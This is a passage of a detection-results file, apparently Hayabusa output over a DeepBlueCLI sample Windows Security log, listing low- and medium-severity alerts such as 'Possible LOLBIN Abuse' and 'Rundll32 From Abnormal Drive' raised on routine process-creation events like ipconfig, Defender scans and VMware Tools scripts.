Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.759 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.766 +00:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.766 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.851 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:30.855 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:31.219 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:31.496 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:31.883 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:37:31.960 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:54:31.771 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:54:31.785 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 14:54:31.794 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program 
files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:04:25.540 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:12:55.760 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:12:55.760 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.352 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.352 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.506 +00:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.506 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.699 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.699 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.794 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:56.794 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File 
Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:57.533 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:19:57.542 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:26:10.013 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:26:10.074 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:52:07.690 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: 
IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:52:09.246 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:55:06.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:55:06.593 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:55:10.198 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:55:10.265 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 19:01:46.591 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 19:10:56.799 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 20:06:31.605 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 20:07:27.112 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 20:07:27.171 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 20:07:27.480 +00:00,IE10Win7,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:05:16.611 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:32:15.294 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:32:37.708 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:33:45.868 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:33:47.755 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:33:47.770 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:36:08.808 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:36:32.722 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 22:00:49.618 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 22:37:32.372 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:07:33.631 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:08:51.641 
+00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 01:05:53.649 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 01:44:32.448 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 01:44:32.463 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:20.612 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.054 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.079 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: 
IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.166 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.686 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.710 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:40.739 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:53:51.556 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 10:02:58.192 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 11:00:00.584 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 11:12:43.202 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:03:25.212 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:12:52.789 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:12:52.817 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask 
-RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:12:52.880 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:14:52.630 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:14:52.630 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:00:10.222 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:21:18.584 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 